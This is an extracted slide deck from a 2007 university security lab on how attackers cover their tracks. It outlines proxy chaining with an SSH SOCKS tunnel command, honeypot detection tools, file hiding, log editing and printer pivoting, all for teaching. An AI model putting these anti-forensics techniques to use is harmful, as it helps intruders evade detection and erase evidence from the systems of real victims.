16
Aktueller Status How Hackers Cover Their Tracks ECE 4112 May 1st, 2007 Group 1 Chris Garyet Christopher Smith Introduction Lab Content Conclusions Questions

How Hackers Cover Their Tracks ECE 4112 May 1st, 2007

Embed Size (px)

DESCRIPTION

Introduction Lab Content Conclusions Questions. How Hackers Cover Their Tracks ECE 4112 May 1st, 2007. Group 1 Chris Garyet Christopher Smith. Introduction. This lab presents techniques for hackers to cover their tracks - PowerPoint PPT Presentation

Citation preview

Aktueller Status

How Hackers Cover Their Tracks ECE 4112

May 1st, 2007

Group 1

Chris Garyet

Christopher Smith

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• This lab presents techniques for hackers to cover their

tracks

• Most experienced blackhats follow a series of steps to compromise a system

• Probe network for weak links through proxy server

• Use direct or indirect methods

• Ensure system is not a honeypot

• Disguise and hide mischievous software

• Cover tracks by editing log files

• With this knowledge a system administrator can easily discover the intrusion and attempt to trace the hacker

Introduction

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Background

• Hackers want to attack anonymously

• Utilize SOCKS 4 or 5 Proxy Servers

• Generally chained together and encrypted

• Tor: http://tor.eff.org/index.html.en

• Proxychains: http://proxychains.sourceforge.net/

• Lab layout

• RedHat 7.2 communicating through RedHat WS 4

• Connect to Apache Webserver

Section 1: Proxies

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Exercise 1.1 (Simulates SOCKS proxy using SSH)

• Create SSH tunnel: ssh –N –D 7001 57.35.6.x

• Setup Netscape

• Connect to Apache Webserver: 138.210.237.99

• NMAP thru proxy

Section 1: Proxies

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Background

• Honeypot system is a trap for malicious hackers

• Two important types

• Low-Interaction Honeyd

• High-Interaction Honeynet

• Most honeypots use VMware emulate multiple systems on one computer

• Examine how to detect VMware is running on compromised machine

Section 2: HoneyPot Detection

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Website devoted to honeypot detection

http://www.trapkit.de/tools/index.html

• Scoopy_doo

• Checks target machine register values against known VMware values

• Runs in Linux and Windows

• Jerry

• Uses I/O backdoor in VMware binary

• Examines value of register EAX

Section 2: HoneyPot Detection

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Background

• Once a system has been compromised the hacker must hide his presence

• One way to do this is by hiding the files the hacker uses to exploit the target machine

• Linux and Windows machines have different file systems and thus require different hiding mechanisms

• Undeletable folders are another nuisance administrators face

• http://archives.neohapsis.com/archives/sf/ms/2001-q2/att-1116/01-THE-END-OF-DELETERS-v2.1.txt

Section 3: Hiding Files

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Exercise 3.1 (Hiding Files in Linux)

• Hide files with the “.” method

• Hide files with ext2hide

• http://e2fsprogs.sourceforge.net/

• http://sourceforge.net/projects/ext2hide/

Section 3: Hiding Files

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Exercise 3.2 (Hiding Files in Windows)

• Hide files with chmod properties

• Hide files in the Alternate Data Stream in NTFS

Section 3: Hiding Files

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Background

• Log files can indicate a machine has been compromised

• Can also give away “trade secrets” and lead to exploit patches

Section 4: Editing & Removing Log Files

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Editing logs in Linux

• Linux logs can be modified with the proper tools

• Syslogd is ASCII encoded and can be edited with any text editor

• UTMP, WTMP, and LASTLOG need rootkit tool

Section 4: Editing & Removing Log Files

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Editing logs in Windows

• Windows logs modified and cleared with the Event Viewer

• Logs for application failures and security warnings including failed login attempts

Section 4: Editing & Removing Log Files

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Background

• An attacker always wants to attack through indirect machines

• Hides the compromised machine and therefore the hacker’s whereabouts

• HP JetDirect allows indirect launching of attacks

Section 5: Indirect and Passive Attacks

Introduction

Lab Content

Conclusions

Questions

Aktueller Status• Exercise 5.1 (HP JetDirect Exploitation)

• HiJetter: http://www.phenoelit.de/hp/download.html

• Store files and scripts

• Create websites: *Printer IP*/hp/device/

• Run NMAP attacks through it

Section 5: Indirect and Passive Attacks

Introduction

Lab Content

Conclusions

Questions

Aktueller Status

Conclusion

Introduction

Lab Content

Conclusions

Questions

• Covering your tracks is key for effective hacking

• Avoid Honeypots to reuse exploits and methods

• Hiding files and changing log files effectively covers tracks

• Running scans and attacks behind cover machines helps protect identity

Aktueller Status

Questions

Introduction

Lab Content

Conclusions

Questions

?